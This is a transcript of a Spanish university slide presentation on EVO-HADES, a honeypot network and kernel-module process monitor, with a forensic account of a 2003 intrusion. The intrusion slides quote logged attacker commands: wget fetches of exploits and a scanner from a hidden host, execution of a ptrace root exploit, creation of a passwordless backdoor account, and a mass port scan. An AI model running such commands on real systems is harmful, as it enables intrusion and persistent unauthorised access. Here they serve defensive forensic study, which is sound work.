La descarga está en progreso. Por favor, espere

La descarga está en progreso. Por favor, espere

EVO-HADES: Arquitectura para la monitorización y análisis forense Jesús Damián Jiménez Re Universidad de Murcia.

Presentaciones similares


Presentación del tema: "EVO-HADES: Arquitectura para la monitorización y análisis forense Jesús Damián Jiménez Re Universidad de Murcia."— Transcripción de la presentación:

1 EVO-HADES: Arquitectura para la monitorización y análisis forense Jesús Damián Jiménez Re Universidad de Murcia

2 2 / 30 Contenido 1. Objetivos 2. Infraestructura de red 3. Monitorización de procesos 4. Análisis de una Intrusión 5. Conclusiones

3 3 / 30 Contenido 1. Objetivos 2. Infraestructura de red 3. Monitorización de procesos 4. Análisis de una Intrusión 5. Conclusiones

4 4 / Objetivos Ámbito de actuación: Evolución del sistema HADES Proyecto fin de carrera desarrollado en la Universidad de Murcia En colaboración con el proyecto de máquinas trampa de RedIRIS

5 5 / Objetivos Objetivo: Diseño de una arquitectura de red que permita:

6 6 / 30 Contenido 1. Objetivos 2. Infraestructura de red 3. Monitorización de procesos 4. Análisis de una Intrusión 5. Conclusiones

7 7 / Infraestructura de red Basada en los sistemas HoneyNET Separación entre: Subred de control Subred trampa Subred corporativa Máquina de control: Conectada físicamente a la subred trampa, pero sin interfaz de red en ella Modo puente Activado filtrado paquetes (firewall)

8 8 / Infraestructura de red Máquina de control Paquete RPM para la instalación del modo puente + firewall Configuración del filtrado/captura de equipos trampa mediante ficheros de configuración: # Ejemplo de fichero de configuración de PED-CONTROL # Maquinas cuyo tráfico se desea capturar: XX.YY captura # Maquinas cuyo tráfico se desea filtrar: ZZ.TT filtra Inicio y parada del puente+firewall con comandos start/stop. Comprobación periódica del tamaño de los ficheros de captura Envío de de alerta Filtrado de tráfico para evitar ataques al exterior

9 9 / Infraestructura de red Máquinas trampa Se han habilitado los servicios habituales en una organización: FTP telnet SSH Servidor Web Proxy …

10 10 / 30 Contenido 1. Objetivos 2. Infraestructura de red 3. Monitorización de procesos 4. Análisis de una Intrusión 5. Conclusiones

11 11 / Monitorización de procesos Existen ocasiones en las que están implicadas conexiones encriptadas entre el equipo trampa y el atacante Ejemplo: El atacante instala una versión modificada del servidor OpenSSH (sshd). No es posible la visualización mediante el análisis del tráfico de la red

12 12 / Monitorización de procesos Solución: Modificaciones a nivel del sistema operativo para el envío remoto de: Procesos/comandos ejecutados Implantación de un módulo a nivel del kernel de Linux que envía información a la máquina de control

13 13 / Monitorización de procesos Módulo para la monitorización Técnica Se interceptan las llamadas al sistema provocadas por los procesos Se ejecuta el código original, más: El nuevo código, que en nuestro caso envía una trama UDP con el proceso ejecutado El tráfico generado por el módulo será capturado por la máquina de control, junto al resto del tráfico de la máquina

14 14 / 30 Contenido 1. Objetivos 2. Infraestructura de red 3. Monitorización de procesos 4. Análisis de una Intrusión 5. Conclusiones

15 15 / Análisis de una intrusión Objetivos del análisis Detectar nuevos patrones de ataque y las herramientas utilizadas para ello Obtener pruebas que justifiquen posibles acciones legales sobre el atacante Estudio de nuevas herramientas The Sleuth Kit y Autopsy Forensic Browser

16 16 / Análisis de una intrusión Metodología: Se utiliza la suma de 3 técnicas: Toda esta información (imágenes + capturas) es pasada a la máquina de análisis para su estudio

17 17 / Análisis de una intrusión Descripción de la máquina atacada Nombre (ficticio): ped.um.es Linux Red Hat 7.2 Puesta en red: 29 de Mayo de Se descubre que ha sido atacada el día 31 de Mayo del Se permite el acceso monitorizado a la máquina durante 11 días (hasta el día 10 de Junio de 2003).

18 18 / Análisis de una intrusión Se detecta un aumento del tráfico HTTPS Se recibe un correo electrónico de alerta From: To: Subject: aumento de 543 K en el trafico de XX.YY A las 20:15:00 el equipo de control control.um.es ha detectado un aumento de 543 K en el tráfico con origen o destino la máquina PED XX.YY

19 19 / Análisis de una intrusión Análisis de tráfico Se ha aprovechado una vulnerabilidad en la llave del protocolo OpenSSL y el servidor Apache. Esto permite iniciar un shell con permisos de Apache. En las conexiones posteriores al tráfico HTTPS, se descubre la descarga de diversos ficheros binarios Análisis forense: Se analizan los ficheros descargados: Exploit pt: Abre un shell con privilegios de root. Se aprovecha de una vulnerabilidad de los kernel 2.4.X en la llamada al sistema ptrace (buffer overflow).

20 20 / Análisis de una intrusión Análisis del tráfico: Instalación del rootkit SuckIT en el directorio /usr/lib/…: Sat May :08: a. d/drwxr-xr-x root/user root /usr/lib/… c -/-rw-rr-- root/user root /usr/lib/…/sk.tgz SuckIT basa su funcionamiento en módulo del núcleo: Oculta PIDs, ficheros, conexiones tcp/udp/socket raw. Integra un shell TTY para el acceso remoto.

21 21 / Análisis de una intrusión No se registra actividad en la máquina hasta el día 3 de Junio Análisis de tráfico: Se sube mediante el servidor web el fichero /tmp/httpd y se ejecuta: Tue Jun :16: c -/-rwxr-xr-x apache apache /tmp/httpd a. -/-rwxr-xr-x apache apache /tmp/httpd.

22 22 / Análisis de una intrusión Análisis forense: /tmp/httpd crea un terminal para la ejecución de comandos, con UID de Apache (48). Análisis de procesos (módulo): Para hacerse con permisos de root, el atacante vuelve a descargar el exploit utilizado para el primer ataque (con otro nombre diferente): 21:17: /06/03 [48:sh:26217:ttyp] cd /tmp 21:18: /06/03 [48:sh:26217:ttyp] wget direccIPoculta/ozn/abc/prt 21:19: /06/03 [48:sh:26217:ttyp] chmod +x prt 21:19: /06/03 [48:sh:26217:ttyp]./prt Para asegurarse una entrada posterior al sistema: 21:19: /06/03 [0:sh:26223:ttyp] /usr/sbin/useradd pwd 21:20: /06/03 [0:sh:26223:ttyp] passwd –d pwd

23 23 / Análisis de una intrusión El atacante instala utilidades para aprovechar la máquina atacada Análisis forense: Se instala un proxy IRC llamado psyBNC: Permite ocultar la IP real a los usuarios del proxy. Mantiene la conexión a IRC aunque se desconecte el cliente

24 24 / Análisis de una intrusión El atacante quiere evitar que otros atacantes aprovechen la vulnerabilidad que él ha aprovechado para entrar al sistema Análisis forense: Se instala el paquete sslstop.tgz, que contiene dos script: sslstop: Detiene el soporte SSL para Apache sslport: Cambia el puerto SSL por defecto de la máquina

25 25 / Análisis de una intrusión Desde el día 3 de Junio hasta el día 6 de Junio: Conexiones de IRC Las conversaciones han quedado registradas en el tráfico capturado de la máquina atacada Se han reconstruido algunas con ethereal.

26 26 / Análisis de una intrusión Tras mantener la máquina comprometida con éxito 7 días, el atacante considera la máquina fiable: Instalación de herramientas para utilizar esta máquina como puente para el ataque a otras: Se instala el exploit con el que se atacó a esta máquina (openssl-too-open). Scanner de puertos

27 27 / Análisis de una intrusión Análisis de la información del módulo: Descarga del exploit openssl-too-open (http.tgz). 03:52: /06/06 [0:bash:4064:pts] cd /etc 03:52: /06/06 [0:bash:4064:pts] mkdir. 03:52: /06/06 [0:bash:4064:pts] cd. 03:52: /06/06 [0:bash:4064:pts] wget dirIPoculta/valisie/http.tgz Descarga y ejecución del scanner mass 11:58: /06/06 [0:bash:4713:pts] wget dirIPoculta/valisie/mass.tgz 11:58: /06/06 [0:bash:4713:pts] tar xvzf mass.tgz 11:58: /06/06 [0:bash:4713:pts] cd mass 11:58: /06/06 [0:bash:4713:pts]./mass –b 67.0.*.* -s 800 Los filtros aplicados en la máquina de control hacen que estos escaneos no tengan éxito.

28 28 / Análisis de una intrusión El día 10 de Junio se decide que ya se ha obtenido suficiente información del atacante. Se aplican el filtrado total a través de la máquina de control. Se apaga la máquina y se desconecta de la red.

29 29 / 30 Contenido 1. Objetivos 2. Infraestructura de red 3. Monitorización de procesos 4. Análisis de una Intrusión 5. Conclusiones

30 30 / Conclusiones Se permite la detección de nuevos tipos y herramientas de ataque sin poner en riesgo los equipos actuales de la organización Con la monitorización de procesos remota: Es fácil ver lo que está sucediendo en la máquina atacada sin tener que cortar la conexión Se obtiene información que no sería posible con las otras técnicas Complementa al análisis forense y análisis del tráfico Vías futuras: Migración de la arquitectura para dar soporte a IPv6 Portar el módulo a otros sistemas operativos Desarrollo de un sistema de aviso de ataques


Descargar ppt "EVO-HADES: Arquitectura para la monitorización y análisis forense Jesús Damián Jiménez Re Universidad de Murcia."

Presentaciones similares


Anuncios Google